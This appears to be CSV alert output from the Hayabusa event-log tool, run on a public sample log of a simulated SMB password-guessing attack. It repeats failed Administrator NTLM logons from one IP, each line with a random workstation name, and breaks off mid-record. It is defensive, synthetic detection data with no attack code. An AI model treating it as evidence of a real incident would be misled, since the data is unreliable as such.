2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.761 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.308 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.732 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: 
